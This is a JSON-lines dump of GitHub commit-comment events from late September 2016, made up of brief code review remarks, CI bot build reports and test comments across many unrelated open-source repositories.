{"id":"4636738364","type":"CommitCommentEvent","actor":{"login":"lisah2u"},"repo":{"name":"ub-idia640-2016/course-materials"},"payload":{"comment":{"id":19222523,"position":null,"line":null,"path":null,"commit_id":"b5de7e7081489f9d97a9a5ffda6931853013e571","created_at":"2016-09-29T11:53:32Z","updated_at":"2016-09-29T11:53:32Z","body":"Good question, Walt. I think the challenge is changing frames from science\nto design. If you have the Johnson book, that's a good bridge. Every\nchapter links to some topic in the course. After doing the main reading,\ntake a browse in Johnson and I think you'll find things come together. From\nthat, you should be able to generate new ideas fairly easily.\n\nLisa\n\n\n\nOn Wed, Sep 28, 2016 at 1:46 PM, WaltLivingston <notifications@github.com>\nwrote:\n\n> I've got my observations and commentary on the chapters, but I'm kind of\n> at a loss how to provide examples of the concepts. How can I provide an\n> example of gestalting, or of one's brain literally trying to make sense of\n> everything that comes in through the optic nerve, by one strategy/technique\n> or anoither. Those are pretty covert processes and happen inside the user.\n> What sort of website might illustrate such fleeting, internal phenomena?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ub-idia640-2016/course-materials/commit/b5de7e7081489f9d97a9a5ffda6931853013e571#commitcomment-19211599>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA9EGCLbh8tOmMG8IYUjO89OtTi_f_tLks5quqgBgaJpZM4KJHIq>\n> .\n>\n"}},"created_at":"2016-09-29T11:53:32Z"}
{"id":"4636738529","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19222524,"position":null,"line":null,"path":null,"commit_id":"0c99981f1d1a4ddf9bb3d57f2d6cf371e125df40","created_at":"2016-09-29T11:53:35Z","updated_at":"2016-09-29T11:53:35Z","body":"Attn. @dcoutts "}},"created_at":"2016-09-29T11:53:35Z"}
{"id":"4636741349","type":"CommitCommentEvent","actor":{"login":"dorfire"},"repo":{"name":"box/box-java-sdk"},"payload":{"comment":{"id":19222538,"position":20,"line":20,"path":"src/main/java/com/box/sdk/BoxUser.java","commit_id":"543ba8760a1f216b7b7deabfbd770ca9e6610d92","created_at":"2016-09-29T11:54:12Z","updated_at":"2016-09-29T11:54:12Z","body":"This request fetches ALL user fields. Afterward, when the programmer calls getInfo on the returned BoxUser object, **another identical request will be issued**.\r\n\r\nCan this be improved? For example, by asking for only the ID field in the first request?"}},"created_at":"2016-09-29T11:54:12Z"}
{"id":"4636743271","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19222545,"position":1,"line":1,"path":"madanni/coupon/tpls.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-29T11:54:36Z","updated_at":"2016-09-29T11:54:36Z","body":"这里为什么不用一个tpls表示呢？最后直接exports一个tpls对象不就可以了吗？"}},"created_at":"2016-09-29T11:54:36Z"}
{"id":"4636747593","type":"CommitCommentEvent","actor":{"login":"hexianglan"},"repo":{"name":"hexianglan/databases"},"payload":{"comment":{"id":19222554,"position":null,"line":null,"path":null,"commit_id":"53632ea6563700a54601b7fba1cd2ca3c66dcd65","created_at":"2016-09-29T11:55:30Z","updated_at":"2016-09-29T11:55:30Z","body":"I love mam!"}},"created_at":"2016-09-29T11:55:30Z"}
{"id":"4636748180","type":"CommitCommentEvent","actor":{"login":"LazyKnightCN"},"repo":{"name":"LazyKnightCN/XYWE"},"payload":{"comment":{"id":19222558,"position":null,"line":null,"path":null,"commit_id":"783341e87bb64c440b323f2da8c709dd85f3e046","created_at":"2016-09-29T11:55:38Z","updated_at":"2016-09-29T11:55:38Z","body":"更新&集成调试器，修正Development/Editor/Core/ydbase/base/util/hybrid_array.h的错误"}},"created_at":"2016-09-29T11:55:38Z"}
{"id":"4636748980","type":"CommitCommentEvent","actor":{"login":"javahometech"},"repo":{"name":"javahometech/spring"},"payload":{"comment":{"id":19222560,"position":null,"line":null,"path":null,"commit_id":"f90a18656bcf7ee80c593215dbcca5e405536bb8","created_at":"2016-09-29T11:55:47Z","updated_at":"2016-09-29T11:55:47Z","body":"this is duplicate of janardhan.py file"}},"created_at":"2016-09-29T11:55:47Z"}
{"id":"4636750533","type":"CommitCommentEvent","actor":{"login":"hacker021"},"repo":{"name":"hacker021/telehacker"},"payload":{"comment":{"id":19222566,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T11:56:08Z","updated_at":"2016-09-29T11:56:08Z","body":"190054608"}},"created_at":"2016-09-29T11:56:08Z"}
{"id":"4636751455","type":"CommitCommentEvent","actor":{"login":"mythz"},"repo":{"name":"ServiceStack/ServiceStack"},"payload":{"comment":{"id":19222570,"position":4,"line":4,"path":"NuGet/ServiceStack.Wire/servicestack.wire.nuspec","commit_id":"515ad9512471b1040695d09495fe96e404772577","created_at":"2016-09-29T11:56:19Z","updated_at":"2016-09-29T11:56:19Z","body":"true :) resolved in [this commit](https://github.com/ServiceStack/ServiceStack/commit/f2a1383797b5eb10c67fbfd2a63f23ee6a577149)."}},"created_at":"2016-09-29T11:56:19Z"}
{"id":"4636753833","type":"CommitCommentEvent","actor":{"login":"justvanrossum"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":19222577,"position":5,"line":233,"path":"Lib/fontTools/ttLib/__init__.py","commit_id":"18d02aece95911834e955f979fc3b396d33a224a","created_at":"2016-09-29T11:56:49Z","updated_at":"2016-09-29T11:56:49Z","body":"Hm, that's just the keys() of the reader.tables dict, so the order is not the original one."}},"created_at":"2016-09-29T11:56:49Z"}
{"id":"4636755744","type":"CommitCommentEvent","actor":{"login":"Phocea"},"repo":{"name":"marmelab/ng-admin"},"payload":{"comment":{"id":19222580,"position":null,"line":null,"path":null,"commit_id":"49cec4e36da91f2f14aabe94ca1e57accee72ae7","created_at":"2016-09-29T11:57:13Z","updated_at":"2016-09-29T11:57:13Z","body":"Thanks.\r\n@jpetitcolas  Do you know when this will be pushed to npm?"}},"created_at":"2016-09-29T11:57:13Z"}
{"id":"4636757394","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19222585,"position":null,"line":null,"path":null,"commit_id":"5ebf88c76d2ecaadcc3b568cfe01e80cd5e28ab4","created_at":"2016-09-29T11:57:35Z","updated_at":"2016-09-29T11:57:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=38)"}},"created_at":"2016-09-29T11:57:35Z"}
{"id":"4636757760","type":"CommitCommentEvent","actor":{"login":"alanz"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19222587,"position":null,"line":null,"path":null,"commit_id":"0c99981f1d1a4ddf9bb3d57f2d6cf371e125df40","created_at":"2016-09-29T11:57:39Z","updated_at":"2016-09-29T11:57:39Z","body":"I tend to agree.\r\n\r\nBut make sure any performance tests turn it off."}},"created_at":"2016-09-29T11:57:39Z"}
{"id":"4636759677","type":"CommitCommentEvent","actor":{"login":"justvanrossum"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":19222597,"position":5,"line":233,"path":"Lib/fontTools/ttLib/__init__.py","commit_id":"18d02aece95911834e955f979fc3b396d33a224a","created_at":"2016-09-29T11:58:05Z","updated_at":"2016-09-29T11:58:05Z","body":"Oops, nevr mind, didn't see the OrderedDict stuff below!"}},"created_at":"2016-09-29T11:58:05Z"}
{"id":"4636760777","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":19222601,"position":5,"line":233,"path":"Lib/fontTools/ttLib/__init__.py","commit_id":"18d02aece95911834e955f979fc3b396d33a224a","created_at":"2016-09-29T11:58:18Z","updated_at":"2016-09-29T11:58:18Z","body":"SFNTReader.tables is an OrderedDict now, sorted by offset."}},"created_at":"2016-09-29T11:58:18Z"}
{"id":"4636761052","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19222602,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-29T11:58:22Z","updated_at":"2016-09-29T11:58:22Z","body":"@pb00067 I see... it's complicated and actually I understand little... Good luck!\n-- \nInviato dal mio dispositivo Android con K-9 Mail. Perdonate la brevità."}},"created_at":"2016-09-29T11:58:22Z"}
{"id":"4636761268","type":"CommitCommentEvent","actor":{"login":"jsimonet"},"repo":{"name":"jsimonet/IRC-Client-Plugin-UserPoints"},"payload":{"comment":{"id":19222603,"position":null,"line":null,"path":null,"commit_id":"b61f8f0c7234cdf4e13a965252a8781d9d7616d3","created_at":"2016-09-29T11:58:24Z","updated_at":"2016-09-29T11:58:24Z","body":"#2 "}},"created_at":"2016-09-29T11:58:24Z"}
{"id":"4636761842","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"dlang/dmd"},"payload":{"comment":{"id":19222604,"position":33,"line":44,"path":"src/root/port.d","commit_id":"398719f1725ab86435e604682fbe8f41b91f708f","created_at":"2016-09-29T11:58:31Z","updated_at":"2016-09-29T11:58:31Z","body":"Yep. I thought these values were set in stone for DMD (as it only supports x86)."}},"created_at":"2016-09-29T11:58:31Z"}
{"id":"4636764681","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19222608,"position":4,"line":96,"path":"lilac","commit_id":"248157447cfec0a4c0d4807f33063a8447c6d972","created_at":"2016-09-29T11:59:08Z","updated_at":"2016-09-29T11:59:08Z","body":"报什么错？"}},"created_at":"2016-09-29T11:59:08Z"}
{"id":"4636764909","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222610,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T11:59:11Z","updated_at":"2016-09-29T11:59:11Z","body":"You are violating some neverallow rules on sepolicy, you should fix the rules that breaks sepolicy or suppress the neverallow. But.. Are you compiling a user build?"}},"created_at":"2016-09-29T11:59:11Z"}
{"id":"4636766991","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222616,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T11:59:39Z","updated_at":"2016-09-29T11:59:39Z","body":"Userdebug"}},"created_at":"2016-09-29T11:59:39Z"}
{"id":"4636767974","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/Madrague"},"payload":{"comment":{"id":19222621,"position":null,"line":null,"path":null,"commit_id":"b3a50976cad5139b8f246674b51d7c7574d1d48d","created_at":"2016-09-29T11:59:51Z","updated_at":"2016-09-29T11:59:51Z","body":"prout"}},"created_at":"2016-09-29T11:59:51Z"}
{"id":"4636768486","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19222623,"position":null,"line":null,"path":null,"commit_id":"2c60554dd75d929a36a5d95ec57e1151462266bd","created_at":"2016-09-29T11:59:59Z","updated_at":"2016-09-29T11:59:59Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=39)"}},"created_at":"2016-09-29T11:59:59Z"}
{"id":"4636769070","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19222624,"position":null,"line":null,"path":null,"commit_id":"bf00b64e1e1cabc8b10a5c9d7aeec2d109bc55f1","created_at":"2016-09-29T12:00:05Z","updated_at":"2016-09-29T12:00:05Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33644/testReport/) for this commit**"}},"created_at":"2016-09-29T12:00:05Z"}
{"id":"4636771284","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19222626,"position":null,"line":null,"path":null,"commit_id":"12fb3171436f0de111960a91154806b8cc6135ac","created_at":"2016-09-29T12:00:28Z","updated_at":"2016-09-29T12:00:28Z","body":"You are right, there indeed seem to be spells that you should cast on yourself on quest reward, this is just not the way to diferantiate between them, cause while this may solve what my commit regressed, but it also pulls back any improvement the commit did."}},"created_at":"2016-09-29T12:00:28Z"}
{"id":"4636771393","type":"CommitCommentEvent","actor":{"login":"hacker021"},"repo":{"name":"hacker021/telehacker"},"payload":{"comment":{"id":19222627,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T12:00:29Z","updated_at":"2016-09-29T12:00:29Z","body":"190054608\r\n"}},"created_at":"2016-09-29T12:00:29Z"}
{"id":"4636772446","type":"CommitCommentEvent","actor":{"login":"scheunemax"},"repo":{"name":"scheunemax/cryptopals"},"payload":{"comment":{"id":19222629,"position":null,"line":null,"path":null,"commit_id":"dd6c9deb57d26575a2bdee0c0f344fb4f88a909b","created_at":"2016-09-29T12:00:42Z","updated_at":"2016-09-29T12:00:42Z","body":"Having a cleaner code for a better understanding."}},"created_at":"2016-09-29T12:00:42Z"}
{"id":"4636774853","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19222633,"position":null,"line":null,"path":null,"commit_id":"0c99981f1d1a4ddf9bb3d57f2d6cf371e125df40","created_at":"2016-09-29T12:01:11Z","updated_at":"2016-09-29T12:01:11Z","body":"Also would be nice to have a warning when it's enabled so that people using `new-build` and building binaries for distribution don't get bitten."}},"created_at":"2016-09-29T12:01:11Z"}
{"id":"4636778299","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/Madrague"},"payload":{"comment":{"id":19222640,"position":null,"line":null,"path":null,"commit_id":"b3a50976cad5139b8f246674b51d7c7574d1d48d","created_at":"2016-09-29T12:01:55Z","updated_at":"2016-09-29T12:01:55Z","body":"reprout"}},"created_at":"2016-09-29T12:01:55Z"}
{"id":"4636778549","type":"CommitCommentEvent","actor":{"login":"Lauuraa"},"repo":{"name":"Lauuraa/Lauuraa.github.io"},"payload":{"comment":{"id":19222641,"position":null,"line":null,"path":null,"commit_id":"e904c69d0a5f1ee0950bbbfabfdf9ce46250e3f3","created_at":"2016-09-29T12:01:59Z","updated_at":"2016-09-29T12:01:59Z","body":"<DOCTYPEhtml>\r\n<html>\r\n<body>\r\n<h1>welcome to my website page</h1>\r\n</body>\r\n</html>"}},"created_at":"2016-09-29T12:01:59Z"}
{"id":"4636781457","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19222647,"position":null,"line":null,"path":null,"commit_id":"a31ac780024ab538b2288748b26335125bf4a8ca","created_at":"2016-09-29T12:02:35Z","updated_at":"2016-09-29T12:02:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 67](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14543&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-29T12:02:35Z"}
{"id":"4636783899","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19222651,"position":null,"line":null,"path":null,"commit_id":"47e00b00d43bc3735f8b723c0cd3ce630953ec6e","created_at":"2016-09-29T12:03:08Z","updated_at":"2016-09-29T12:03:08Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=40)"}},"created_at":"2016-09-29T12:03:08Z"}
{"id":"4636785649","type":"CommitCommentEvent","actor":{"login":"cash3603"},"repo":{"name":"cash3603/Python"},"payload":{"comment":{"id":19222656,"position":null,"line":null,"path":null,"commit_id":"382aa1350c483de6bf8e1556c7e0c6f92e7c7e28","created_at":"2016-09-29T12:03:30Z","updated_at":"2016-09-29T12:03:30Z","body":"This was modified from Eriks and Frank's code"}},"created_at":"2016-09-29T12:03:30Z"}
{"id":"4636790129","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19222660,"position":null,"line":null,"path":null,"commit_id":"a31ac780024ab538b2288748b26335125bf4a8ca","created_at":"2016-09-29T12:04:28Z","updated_at":"2016-09-29T12:04:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 67](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14543&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:53"}},"created_at":"2016-09-29T12:04:28Z"}
{"id":"4636791872","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222663,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T12:04:51Z","updated_at":"2016-09-29T12:04:51Z","body":"Then you must fix rules that breaks neverallows"}},"created_at":"2016-09-29T12:04:51Z"}
{"id":"4636794235","type":"CommitCommentEvent","actor":{"login":"loebrud"},"repo":{"name":"loebrud/LPS25HB-JAVA-ME-EMBED-DRIVER"},"payload":{"comment":{"id":19222666,"position":null,"line":null,"path":null,"commit_id":"432466c22c2152ac39bf4a26278d3a618a2bca40","created_at":"2016-09-29T12:05:23Z","updated_at":"2016-09-29T12:05:23Z","body":"Nicely done! Thanks."}},"created_at":"2016-09-29T12:05:23Z"}
{"id":"4636794619","type":"CommitCommentEvent","actor":{"login":"nanaluisa"},"repo":{"name":"nanaluisa/crescer-2016-2"},"payload":{"comment":{"id":19222669,"position":24,"line":24,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"0aa70deaffd0f1e33a4de051651eb340b23528b5","created_at":"2016-09-29T12:05:29Z","updated_at":"2016-09-29T12:05:29Z","body":"Ok, obrigada pelas dicas! Vou melhorar este trecho!"}},"created_at":"2016-09-29T12:05:29Z"}
{"id":"4636797817","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19222677,"position":null,"line":null,"path":null,"commit_id":"24f9f9a7bd4b8b51f107898c0adcacf385cac0dd","created_at":"2016-09-29T12:06:09Z","updated_at":"2016-09-29T12:06:09Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=41)"}},"created_at":"2016-09-29T12:06:09Z"}
{"id":"4636798972","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222679,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T12:06:24Z","updated_at":"2016-09-29T12:06:24Z","body":"How can u do this ? :/ never happent to me...\r\nEdit the device/samsung/jf-common/sepolicy files according to error log ?"}},"created_at":"2016-09-29T12:06:24Z"}
{"id":"4636799754","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19222682,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:06:35Z","updated_at":"2016-09-29T12:06:35Z","body":"prout"}},"created_at":"2016-09-29T12:06:35Z"}
{"id":"4636802373","type":"CommitCommentEvent","actor":{"login":"rking-ubuntu"},"repo":{"name":"rking-ubuntu/gitskill"},"payload":{"comment":{"id":19222686,"position":null,"line":null,"path":null,"commit_id":"308138c982bb85d355063435a9290697d59bfe49","created_at":"2016-09-29T12:07:07Z","updated_at":"2016-09-29T12:07:07Z","body":"test"}},"created_at":"2016-09-29T12:07:07Z"}
{"id":"4636803181","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19222689,"position":null,"line":null,"path":null,"commit_id":"0c99981f1d1a4ddf9bb3d57f2d6cf371e125df40","created_at":"2016-09-29T12:07:16Z","updated_at":"2016-09-29T12:07:16Z","body":"A low-tech solution is to put something like this in `Main.hs`: ``assertMsg \"attention: asserts enabled\" (return ()) `catch` \\(e ::AssertionFailed) -> warn verbosity (displayException e)``"}},"created_at":"2016-09-29T12:07:16Z"}
{"id":"4636809773","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19222700,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:08:40Z","updated_at":"2016-09-29T12:08:40Z","body":"fgdfghfdgs"}},"created_at":"2016-09-29T12:08:40Z"}
{"id":"4636813888","type":"CommitCommentEvent","actor":{"login":"nanaluisa"},"repo":{"name":"nanaluisa/crescer-2016-2"},"payload":{"comment":{"id":19222712,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEraTest.java","commit_id":"3cab355b068e2d636b9cc821cd14cd73f3c78857","created_at":"2016-09-29T12:09:34Z","updated_at":"2016-09-29T12:09:34Z","body":"Ok! Obrigada pela dica!"}},"created_at":"2016-09-29T12:09:34Z"}
{"id":"4636815604","type":"CommitCommentEvent","actor":{"login":"Natureshadow"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19222715,"position":null,"line":null,"path":null,"commit_id":"ba9add46a9fda6b98aac2d4ccf426a9cd96fea02","created_at":"2016-09-29T12:09:57Z","updated_at":"2016-09-29T12:09:57Z","body":"How would you disable the mute feature with this change in place?"}},"created_at":"2016-09-29T12:09:57Z"}
{"id":"4636819375","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222724,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T12:10:43Z","updated_at":"2016-09-29T12:10:43Z","body":"I don't know what sources you are using, so i have no idea"}},"created_at":"2016-09-29T12:10:43Z"}
{"id":"4636819640","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19222725,"position":null,"line":null,"path":null,"commit_id":"62b78a8a9f69b487df69a72926ff6f9cff822eec","created_at":"2016-09-29T12:10:46Z","updated_at":"2016-09-29T12:10:46Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-29T12:10:46Z"}
{"id":"4636820736","type":"CommitCommentEvent","actor":{"login":"davepatterson"},"repo":{"name":"jpotts18/SwiftValidator"},"payload":{"comment":{"id":19222731,"position":null,"line":null,"path":null,"commit_id":"761df17e0439330d6b7a22b344865d131a82d8c9","created_at":"2016-09-29T12:11:01Z","updated_at":"2016-09-29T12:11:01Z","body":"@jpotts18 Yeah but I'm hoping that it doesn't come to that. This weekend I'll have time to investigate and hopefully resolve the issue."}},"created_at":"2016-09-29T12:11:01Z"}
{"id":"4636824209","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19222737,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T12:11:44Z","updated_at":"2016-09-29T12:11:44Z","body":"U told me to fix the rules. What would u do if that happens on aosp ? \r\nI will understand what to do on cm"}},"created_at":"2016-09-29T12:11:44Z"}
{"id":"4636827524","type":"CommitCommentEvent","actor":{"login":"kuldeepaggarwal"},"repo":{"name":"TanSA05/OpenFarm"},"payload":{"comment":{"id":19222745,"position":9,"line":9,"path":"spec/controllers/api/api_tags_controller_spec.rb","commit_id":"67a95309b644204150e0c4362d691ac323fcffab","created_at":"2016-09-29T12:12:26Z","updated_at":"2016-09-29T12:12:26Z","body":"Are we using `@beans` instance variable?"}},"created_at":"2016-09-29T12:12:26Z"}
{"id":"4636831258","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19222752,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T12:13:12Z","updated_at":"2016-09-29T12:13:12Z","body":"fgdsfgdfgsdg"}},"created_at":"2016-09-29T12:13:12Z"}
{"id":"4636832602","type":"CommitCommentEvent","actor":{"login":"betzholz"},"repo":{"name":"twigphp/Twig"},"payload":{"comment":{"id":19222754,"position":25,"line":264,"path":"lib/Twig/Loader/Filesystem.php","commit_id":"6f0e3edbc55a7ce0464fa0ec90462d66822e0750","created_at":"2016-09-29T12:13:27Z","updated_at":"2016-09-29T12:13:27Z","body":"God same problem with Pharfiles.... \"phar:///var...\" will be \"phar:/var/..\" which ist not working"}},"created_at":"2016-09-29T12:13:27Z"}
{"id":"4636833892","type":"CommitCommentEvent","actor":{"login":"kuldeepaggarwal"},"repo":{"name":"TanSA05/OpenFarm"},"payload":{"comment":{"id":19222755,"position":14,"line":14,"path":"spec/controllers/api/api_tags_controller_spec.rb","commit_id":"67a95309b644204150e0c4362d691ac323fcffab","created_at":"2016-09-29T12:13:44Z","updated_at":"2016-09-29T12:13:44Z","body":"We can also do this like:\r\n\r\n```\r\nFactoryGirl.create(:crop, name: 'mung bean', tags: 'tagOne')\r\nFactoryGirl.create(:crop, tags: 'tagTwo')\r\nCrop.searchkick_index.refresh\r\n```"}},"created_at":"2016-09-29T12:13:44Z"}
{"id":"4636836783","type":"CommitCommentEvent","actor":{"login":"arleytriana"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":19222762,"position":null,"line":null,"path":null,"commit_id":"7c074ecf9f2c2129a5b7d7552942d2e05f6350df","created_at":"2016-09-29T12:14:21Z","updated_at":"2016-09-29T12:14:21Z","body":"Fixes #1133"}},"created_at":"2016-09-29T12:14:21Z"}
{"id":"4636838676","type":"CommitCommentEvent","actor":{"login":"ryo-hatchet"},"repo":{"name":"ryo-hatchet/sample"},"payload":{"comment":{"id":19222765,"position":null,"line":null,"path":null,"commit_id":"0f5097d24f0688b6923b16060afb506ec21897ed","created_at":"2016-09-29T12:14:43Z","updated_at":"2016-09-29T12:14:43Z","body":"っg"}},"created_at":"2016-09-29T12:14:43Z"}
{"id":"4636843189","type":"CommitCommentEvent","actor":{"login":"johanandren"},"repo":{"name":"akka/akka"},"payload":{"comment":{"id":19222774,"position":6,"line":4,"path":"akka-samples/akka-sample-cluster-scala/src/main/resources/application.conf","commit_id":"5558caa1f016003ec7b4d33ce5e8f82106dcd020","created_at":"2016-09-29T12:15:39Z","updated_at":"2016-09-29T12:15:39Z","body":"Why these though, \"cluster\" should be fine with the merge and old remoting?"}},"created_at":"2016-09-29T12:15:39Z"}
{"id":"4636844424","type":"CommitCommentEvent","actor":{"login":"zevv"},"repo":{"name":"zevv/bucklespring"},"payload":{"comment":{"id":19222777,"position":null,"line":null,"path":null,"commit_id":"ba9add46a9fda6b98aac2d4ccf426a9cd96fea02","created_at":"2016-09-29T12:15:55Z","updated_at":"2016-09-29T12:15:55Z","body":"* On 2016-09-29 14:09:57 +0200, Dominik George wrote:\n \n> How would you disable the mute feature with this change in place?\n\nSet to 0 would do, since this is an unused keycode.\n\n-- \n:wq\n^X^Cy^K^X^C^C^C^C\n"}},"created_at":"2016-09-29T12:15:55Z"}
{"id":"4636845243","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19222779,"position":null,"line":null,"path":null,"commit_id":"4f018e6eb5acc0237b14e06a096868de29291f64","created_at":"2016-09-29T12:16:04Z","updated_at":"2016-09-29T12:16:04Z","body":"doh! 😞 "}},"created_at":"2016-09-29T12:16:04Z"}
{"id":"4636847617","type":"CommitCommentEvent","actor":{"login":"khorolets"},"repo":{"name":"frol/flask-restplus-server-example"},"payload":{"comment":{"id":19222785,"position":26,"line":47,"path":"flask_restplus_patched/resource.py","commit_id":"0d5faccaf0f1368c93531b9663b3531b9b1820b0","created_at":"2016-09-29T12:16:29Z","updated_at":"2016-09-29T12:16:29Z","body":"I think you need to change `'_chached_ok_func'` to '`_cached_fake_method_func'` here"}},"created_at":"2016-09-29T12:16:29Z"}
{"id":"4636854011","type":"CommitCommentEvent","actor":{"login":"RobortHuan"},"repo":{"name":"RobortHuan/hello-world"},"payload":{"comment":{"id":19222808,"position":null,"line":null,"path":null,"commit_id":"607abb42c9b543d5954177c68efedc1768444678","created_at":"2016-09-29T12:17:45Z","updated_at":"2016-09-29T12:17:45Z","body":"！"}},"created_at":"2016-09-29T12:17:45Z"}
